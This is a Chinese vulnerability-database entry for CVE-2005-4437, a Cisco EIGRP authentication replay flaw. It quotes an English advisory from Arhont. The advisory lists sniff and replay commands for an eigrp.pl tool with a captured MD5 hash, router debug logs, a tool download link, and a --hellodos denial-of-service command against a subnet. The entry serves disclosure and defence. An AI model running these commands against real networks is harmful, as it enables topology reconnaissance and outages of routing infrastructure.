Cisco EIGRP协议HELLO包重播漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1196836 漏洞类型 设计错误
发布时间 2005-12-20 更新时间 2009-03-04
CVE编号 CVE-2005-4437 CNNVD-ID CNNVD-200512-469
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2005120054
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200512-469
|漏洞详情
ExtendedInteriorGatewayRoutingProtocol(EIGRP)1.2中的MD5Neighbor认证当实施于CiscoIOS11.3及其之后版本中时,在校验和中没有包括消息认证代码(MAC),远程攻击者因此可以通过发送大量的欺骗性EIGRP邻域公告引发本地网中的ARP风暴,来嗅探消息哈希表并(1)重播EIGRPHELLO消息或(2)发起拒绝服务攻击。
|漏洞EXP
Arhont Ltd.- Information Security

Arhont Advisory by:     Arhont Ltd
Advisory:                     Authenticated EIGRP DoS / Information leak
Class:                           design bug
Version:                       EIGRP version 1.2
Model Specific:            Other versions might have the same bug

DETAILS:

From experiments with capturing and replaying back at the router a 
variety of authenticated EIGRP packets, it appears that the MD5 
algorithm is ran against the following packet fields: Opcode, AS number, 
Flags, Sequence Number, Nexthop. Thus, the presence of Message 
Authentication Code (MAC) does not stop attackers from replaying HELLO 
packets back at the router. The only condition is needed is to sniff the 
hash and throw it back at the EIGRP routers. An example of this would be

1. Sniff
arhontus# ./eigrp.pl --sniff --iface eth0
<skip>
<<<Authentication data: 0002>>>
         Size: 40
         Key ID: 2
         MD5 key digest: efe07403446c77a9697fe5753f79e52
         Key in one string (Copy & paste to replay)
         
00020010000000020000000000000000000000000efe07403446c77a9697fe5753f79e52

2. Replay
arhontus#./eigrp.pl --hello --auth 
00020010000000020000000000000000000000000efe07403446c77a9697fe5753f79e52

The packets are received well and trigger back an EIGRP update to sniff 
it and find more about the network topology:
061751: 04:13:46: EIGRP: received packet with MD5 authentication, key id = 2
061752: 04:13:46: EIGRP: Received HELLO on Ethernet0/0 nbr 192.168.66.112
061753: 04:13:46:   AS 1, Flags 0x0, Seq 0/0 idbQ 0/0 iidbQ un/rely 0/0 
peerQ un/rely 0/1
061754: 04:13:46: EIGRP: Sending UPDATE on Ethernet0/0 nbr 
192.168.66.112, retry 2, RTO 4500
061755: 04:13:46:   AS 1, Flags 0x9, Seq 2162/0 idbQ 1/0 iidbQ un/rely 
0/0 peerQ un/rely 0/1 serno 3-8

As a result of it, additional information about the EIGRP domain can be 
collected from the triggered UPDATE packets.

Besides, using this method the FX EIGRP/ARP DoS attack (BID 6443) can be 
ported to the authenticated EIGRP routing domain. This is done by 
combining --hellodos and --auth <captured hash> flags when running the 
attack using our EIGRP packet generator. The attack appears to be more 
efficient, than the original attack described by FX, since the routers 
recover much slower. This is possibly due to the additional overhead of 
processing the authentication information. An example of the attack 
command killing the network would be
arhontus#./eigrp.pl --hellodos 192.168.66.0 --auth 
00020010000000020000000000000000000000000efe07403446c77a9697fe5753f79e52
 
--source 192.168.66.112

Tool: http://www.hackingciscoexposed.com/tools/eigrp-tools.tar.gz

Risk Factor: Medium for DoS, Low for the Information Leak

Workarounds: Extend the Message Authentication Code onto the currently 
unauthenticated EIGRP packet fields.

Communication History: sent to PSIRT on 10/10/05

*According to the Arhont Ltd. policy, all of the found vulnerabilities 
and security issues will be reported to the manufacturer at least 7 days 
before
releasing them to the public domains (such as CERT and BUGTRAQ).

If you would like to get more information about this issue, please do 
not hesitate to contact Arhont team.*
|参考资料

来源:BUGTRAQ
名称:20051220Re:UnauthenticatedEIGRPDoS
链接:http://www.securityfocus.com/archive/1/archive/1/419898/100/0/threaded
来源:BUGTRAQ
名称:20051219AuthenticatedEIGRPDoS/Informationleak
链接:http://www.securityfocus.com/archive/1/archive/1/419830/100/0/threaded
来源:OVAL
名称:oval:org.mitre.oval:def:5741
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:5741
来源:FULLDISC
名称:20051220RE:AuthenticatedEIGRPDoS/Informationleak
链接:http://marc.theaimsgroup.com/?l=full-disclosure&m=113504451523186&w=2
来源:FULLDISC
名称:20051219AuthenticatedEIGRPDoS/Informationleak
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2005-December/040332.html
来源:BID
名称:15970
链接:http://www.securityfocus.com/bid/15970
来源:VUPEN
名称:ADV-2005-3008
链接:http://www.frsirt.com/english/advisories/2005/3008
来源:SECTRACK
名称:1015382
链接:http://securitytracker.com/id?1015382
来源:SREASON
名称:274
链接:http://securityreason.com/securityalert/274